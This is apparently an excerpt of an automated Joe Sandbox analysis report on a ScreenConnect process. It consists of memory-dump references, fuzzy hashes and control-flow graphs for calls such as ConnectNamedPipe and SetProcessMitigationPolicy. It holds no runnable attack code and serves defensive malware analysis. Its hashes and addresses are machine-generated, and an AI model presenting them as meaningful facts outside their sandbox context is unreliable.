                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P'H
                                                                                                                                                                                                                                                        • API String ID: 0-2816453460
                                                                                                                                                                                                                                                        • Opcode ID: 362377eed257f4d42e91b13f740eb377fa19369255a4b6c60be93f3f8cce3140
                                                                                                                                                                                                                                                        • Instruction ID: 484081597f0fa1e2fa29ec9e6030a89fd187437c64f3d388b2f5a2c04a378737
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 362377eed257f4d42e91b13f740eb377fa19369255a4b6c60be93f3f8cce3140
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01B10532D0D98A5FEB6AFE2894424F537D1EF65790B5401BED44E871C7EE18BC0A8B81

Control-flow Graph

control_flow_graph 1283 7ff848e5365b-7ff848e75860 ConnectNamedPipe 1289 7ff848e75868-7ff848e758b0 call 7ff848e758b1 1283->1289 1290 7ff848e75862 1283->1290 1290->1289
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
Similarity
• API ID: ConnectNamedPipe
• String ID:
• API String ID: 2191148154-0

Control-flow Graph

control_flow_graph 1294 7ff848e53652-7ff848e75860 ConnectNamedPipe 1298 7ff848e75868-7ff848e758b0 call 7ff848e758b1 1294->1298 1299 7ff848e75862 1294->1299 1299->1298
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
Similarity
• API ID: ConnectNamedPipe
• String ID:
• API String ID: 2191148154-0

Control-flow Graph

control_flow_graph 1303 7ff848e53a92-7ff848e580ef 1305 7ff848e580f6-7ff848e58150 SetProcessMitigationPolicy 1303->1305 1306 7ff848e58158-7ff848e58187 1305->1306 1307 7ff848e58152 1305->1307 1307->1306
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1490400709738937055637f5c628996b51ac538a9d452b4e75c4bc5665ef2d7d
                                                                                                                                                                                                                                                        • Instruction ID: cadc7942c562c072aa5677c43bf8e6a0bf1c4e4de4712121aa0e09743070f5a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1490400709738937055637f5c628996b51ac538a9d452b4e75c4bc5665ef2d7d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49319171A0DA868FD799EF28C454AB977E1FF58344F0445BDD449CB296CA29BC01CB81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a138905d5f19db10c0a4434a1ab3af044aba617ded5ac089a52102f56c7bd275
                                                                                                                                                                                                                                                        • Instruction ID: 8a7a7e14a48ea96e4fd6c1ec5fe715a13d28dffa897d32f7a5ac5991bba434c8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a138905d5f19db10c0a4434a1ab3af044aba617ded5ac089a52102f56c7bd275
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5211B471D0DA898FEFA5EF6898552F87BA0FFA5345F0500AAD058C32D6CB285C01CB02
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: da683677dba897b369de84bb6d389abaa0197f9a466dcef3d84674ed50ede9af
                                                                                                                                                                                                                                                        • Instruction ID: d3861ef237b2e8304a2633f0344aa0075a176d3c43f22ae0e9310c66af7318d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da683677dba897b369de84bb6d389abaa0197f9a466dcef3d84674ed50ede9af
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511C832F0DA894FFB66AB7C28202F83692EF84394F1404E6D15CC3292CE2D5D008A85
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ac145fa9aa10aa8b7b609badf1e3837bea1013e5a565a61cc3b4fdd2affb3089
                                                                                                                                                                                                                                                        • Instruction ID: de302670ffa3b884fe14ac600479b7f7dc678efa690cf8db66323b69f88fdfa6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac145fa9aa10aa8b7b609badf1e3837bea1013e5a565a61cc3b4fdd2affb3089
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92116A3044E7C99FC7479B648C259953FB4EE8725470A01E7E089CB1B3D62D8A5BCBA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e5ce7c858fdde56d3e960df6de9c19ac746f32bbeb918d6959b8ff33e691c95
                                                                                                                                                                                                                                                        • Instruction ID: 1203b1626d0ce92bef618cb933e0e402bb055dad33add1515c365e02c0e6fade
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e5ce7c858fdde56d3e960df6de9c19ac746f32bbeb918d6959b8ff33e691c95
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B114C31E0C98A8FDAE9EF28C445B6577A1FF58354F1445FCC44ECB296CA28EC458B84
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5b658d14ce7fb5571b154615a7708795cb9885935d561699b4d58cd242c7793c
                                                                                                                                                                                                                                                        • Instruction ID: 2a1825afe81fa974c3b6c9f04ab0a05ffa24d5170683dcce1ae293ec758448ef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b658d14ce7fb5571b154615a7708795cb9885935d561699b4d58cd242c7793c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31114931E0C98A8FDAD9EF28C445BA577A1FF58354F1441E8C44ECB296CA28EC458B84
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a616ee7a01dfa329717297d172cde0313ab40c243c541014e0b8a324302d5eb9
                                                                                                                                                                                                                                                        • Instruction ID: 0f2bc066c6e4d81526dd4d36bb568ea66d2e622b095b8cb9f53762237b268a99
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a616ee7a01dfa329717297d172cde0313ab40c243c541014e0b8a324302d5eb9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25112515D0DAA30FF7BAA62844643B56AE1EF81380F0D81BAC449C61D6DD2DAC818B02
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b25e10c9563f2a0239bf14f99ee6085bca5ba6abea607ae69eaabb852da5c00
                                                                                                                                                                                                                                                        • Instruction ID: 6a5221230e8c42da08e4969030abadf9f8268df287efc06ed5319d93322aa3c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b25e10c9563f2a0239bf14f99ee6085bca5ba6abea607ae69eaabb852da5c00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C01D142F0C9CA5FF1B6B62C68452B85BC2EBD95B0B4C01FAD409C719FED186C468381
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:11.3%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:10
                                                                                                                                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                                                                                                                                        execution_graph 14785 7ff849188cb4 14786 7ff849188cbd 14785->14786 14787 7ff849188e59 GlobalMemoryStatusEx 14786->14787 14788 7ff849188db2 14786->14788 14789 7ff849188e85 14787->14789 14790 7ff848e78014 14791 7ff848e7801d 14790->14791 14792 7ff848e78082 14791->14792 14793 7ff848e780f6 SetProcessMitigationPolicy 14791->14793 14794 7ff848e78152 14793->14794

                                                                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph for the function at 7ff849188cb4, including the GlobalMemoryStatusEx call at 7ff849188e59; node legend: executed / not executed]
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2480598438.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1890195054-0
                                                                                                                                                                                                                                                        • Opcode ID: 201b6ce45451f9d9edc0ae01556ce2b98545c6bff6da104e8651c72b9731ccbe
                                                                                                                                                                                                                                                        • Instruction ID: 9bf37ac3ca341140ea0d938d8948d518444822930a0a084c72e883f830e5ae91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 201b6ce45451f9d9edc0ae01556ce2b98545c6bff6da104e8651c72b9731ccbe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD81273180D6C94FE775EB6898156E87FE0EF623A0F0542FAD06CC7593DA6C680ADB41

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2478051094.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff848e70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: b00b9143905d127213113679447a6af93bd6e312cb0d90ca136d4b0f98511dfc
                                                                                                                                                                                                                                                        • Instruction ID: 0a393edf38f033a971e66ca36df35bec77e6db35dc9e3772fa1e5d1df68ec733
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b00b9143905d127213113679447a6af93bd6e312cb0d90ca136d4b0f98511dfc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4512731C0CB584FEB19AFA8984A5E97BE0EF66751F04017FE049C3292DF78A846C795